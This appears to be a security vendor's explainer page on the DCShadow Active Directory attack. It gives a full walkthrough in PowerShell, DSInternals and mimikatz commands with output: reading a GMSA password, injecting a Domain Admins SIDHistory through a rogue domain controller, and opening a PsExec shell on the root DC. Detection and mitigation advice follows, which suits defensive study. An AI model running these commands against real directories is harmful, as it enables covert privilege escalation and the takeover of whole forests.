DCShadow

DCShadow

DCShadow is a technique in which an attacker abuses compromised replication permissions to mimic a domain controller and make malicious changes to Active Directory. It is a particularly stealthy technique, as the methods it uses do not create logs that detail the changes made. Thus, it can be difficult to discover and remove the changes made by an adversary.

Threat Summary

Target:

Active Directory

Tools:

ATT&CK® Tactic:

ATT&CK Technique:

Difficulty

Detection:

Medium

Mitigation:

Medium

Response:

Hard

DCShadow

Hover to see each step

Step 1: To perform the DCShadow attack an adversary must first compromise the credentials of a user with administrative permissions in Active Directory. For example, the password for a poorly secured Group Managed Service Account (GMSA) with those privileges could be compromised.

PS> Install-Module DSInternals -Force
PS> $GMSAPwd = (Get-ADServiceAccount GMSA1 -Prop msDS-ManagedPassword).'msDS-ManagedPassword'
PS> ConvertFrom-ManagedPasswordBlob $GMSAPwd | Select-Object -ExpandProperty CurrentPassword
帙뽐怦渌㉼璿盯粩랜曞꘭�呓ꉷᏤ�뉇ꘉ욚�㡝측퉷ㅓ栤쪇�픸滈್䊟杂瀳谈ꋋ랕軡첤研麛쪡뚗ጵ謗篷협锭褶࡮뻭寞ꁕꈳ¹䲔ᯊ鵋宫鰄먚㹆⻔㚅买嬷滺눲㫚圐ન盢ḟ뼁ጘ䱏ケ蔤䮍⿆߾겋舤쇻ω킌쏑ퟠ쎫�갥挼矤缀醩ℸꆀ뭈Ȩ窢盒२葰霝빶덻妓㼪喟㗾ꖣ뙑ข
PS> 

Step 2: Using the privileges compromised in the previous step, the adversary can now replicate objects from Active Directory, make changes to them, and push those changes back to a real domain controller.

To execute the attack, the adversary must interact with two consoles: in the first, the adversary must elevate to SYSTEM and make changes to the replicated object; in the second, the attacker uses the compromised permissions to push the changes back to a real domain controller. It is often used to surreptitiously hide persistence mechanisms, or to escalate privileges across domain trusts.

A common example, demonstrated below for the user BobT, is to inject a SIDHistory value for a privileged group in the same or another trusting domain. The SID used in this example represents the Domain Admins group in the parent (or forest root) domain.

PS> .\mimikatz.exe
mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started
 
mimikatz # !ProcessToken
Token from process 0 to process 0
 * from 0 will take SYSTEM token
 * to 0 will take all 'cmd' and 'mimikatz' process
Token from 4/System
 * to 2232/powershell.exe
 * to 1252/cmd.exe
 * to 4496/mimikatz.exe
 
mimikatz # lsadump::dcshadow /object:"CN=BobT,OU=Employees,DC=sub,DC=domain,DC=com" /attribute:SidHistory /value:S-1-5-21-441320023-234525631-506766575-512
** Domain Info **
 
Domain:         DC=sub,DC=domain,DC=com
Configuration:  CN=Configuration,DC=domain,DC=com
Schema:         CN=Schema,CN=Configuration,DC=domain,DC=com
dsServiceName:  ,CN=Servers,CN=Site2,CN=Sites,CN=Configuration,DC=domain,DC=com
domainControllerFunctionality: 7 ( WIN2016 )
highestCommittedUSN: 468849
 
** Server Info **
 
Server: dc1.sub.domain.com
  InstanceId  : {be2d1604-3232-42f6-9c5b-8a37fbcdd357}
  InvocationId: {b38c988f-c904-4c18-afb3-943f12c12399}
Fake Server (not already registered): wks2.sub.domain.com
 
** Attributes checking **
 
#0: SidHistory
 
** Objects **
 
#0: CN=BobT,OU=Employees,DC=sub,DC=domain,DC=com
  SidHistory (1.2.840.113556.1.4.609-90261 rev 0):
    S-1-5-21-441320023-234525631-506766575-512
    (01050000000000051500000057024e1abf93fa0defa4341e00020000)
 
 
** Starting server **
 
 > BindString[0]: ncacn_ip_tcp:wks2[59644]
 > RPC bind registered
 > RPC Server is waiting!
== Press Control+C to stop ==
  cMaxObjects : 1000
  cMaxBytes   : 0x00a00000
  ulExtendedOp: 0
  pNC->Guid: {5bf57149-701e-47c1-bb39-35577f4ea087}
  pNC->Sid : S-1-5-21-3501040295-3816137123-30697657
  pNC->Name: DC=sub,DC=domain,DC=com
SessionKey: 1ade4b2cd9238108e9cc7c275202b9705c4bca951cbdf0e09b6a061a0e678740
1 object(s) pushed
 > RPC bind unregistered
 > stopping RPC server
 > RPC server stopped
PS> .\mimikatz.exe
mimikatz # lsadump::dcshadow /push
** Domain Info **
 
Domain:         DC=sub,DC=domain,DC=com
Configuration:  CN=Configuration,DC=domain,DC=com
Schema:         CN=Schema,CN=Configuration,DC=domain,DC=com
dsServiceName:  ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=domain,DC=com
domainControllerFunctionality: 7 ( WIN2016 )
highestCommittedUSN: 1037880
 
** Server Info **
 
Server: dc1.sub.domain.com
  InstanceId  : {ebe88399-c570-4143-bb89-9dc6546b8e09}
  InvocationId: {bef4eddf-eb26-4324-ba9d-abbae40669c5}
Fake Server (not already registered): wks2.sub.domain.com
 
** Performing Registration **
 
** Performing Push **
 
Syncing DC=sub,DC=domain,DC=com
Sync Done
 
** Performing Unregistration **

Step 3: Next, the adversary authenticates with the BobT user to complete their pivot and privilege escalation to the forest root domain. Gaining administrative access to the forest root domain allows the attacker to compromise any other domain in the forest.

PS> .\PsExec.exe \\dc1.domain.com powershell.exe
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS> hostname
dc1
PS>

Detect, Mitigate, and Respond

Difficulty: Medium

It is possible to detect signs of DCShadow through network and Windows event log monitoring. However, neither approach readily shows the changes made by the adversary. Network monitoring of DRSUAPI RPC requests for the operation DRSUAPI_REPLICA_ADD originating from systems that are not known domain controllers is the only concrete way to identify DCShadow.

It is also possible to detect certain signs of DCShadow in Windows event logs. In order to mimic a domain controller, DCShadow must make several changes in Active Directory: 1) add a new NTDSDSA object, and 2) add a global catalog (GC/<host>servicePrincipalName to a computer object that is not a known domain controller. After the attack is completed, these items are removed.

The Windows event log Audit Directory Service Changes subcategory includes Event ID 5136 and Event ID 5141, which can be analyzed to look for creation and deletion of server objects within sites.

Difficulty: Medium

Because DCShadow abuses features and privileges of Active Directory, it is not possible to eliminate entirely. However, the following items can help reduce the risk that an adversary can successfully obtain the privileges necessary to execute the attack.

  • Utilize host-based firewalls to constrain lateral movement. For example, firewall policies should only allow RDP or other remote management from a small number of approved, controlled, and monitored systems.
  • Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that an adversary can escalate their privileges.
  • Constrain the number of users with permissions to add computer objects to Active Directory.
  • Reduce and tightly govern built-in privileged groups and delegated administrative permissions.
  • Adopt good Active Directory hygiene: remove unused sites and computer objects.

Difficulty: Hard

DCShadow requires an adversary to have obtained substantial (e.g. Domain Admins) privileges in Active Directory. If it is detected, a total compromise of Active Directory should be presumed.

  • Activate the incident response process and alert the incident response team.
  • Identify and quarantine implicated computers for forensic investigation and remediation activities.

Additional Resources

Learn More About DCShadow

In Practice

Stealthbits Solutions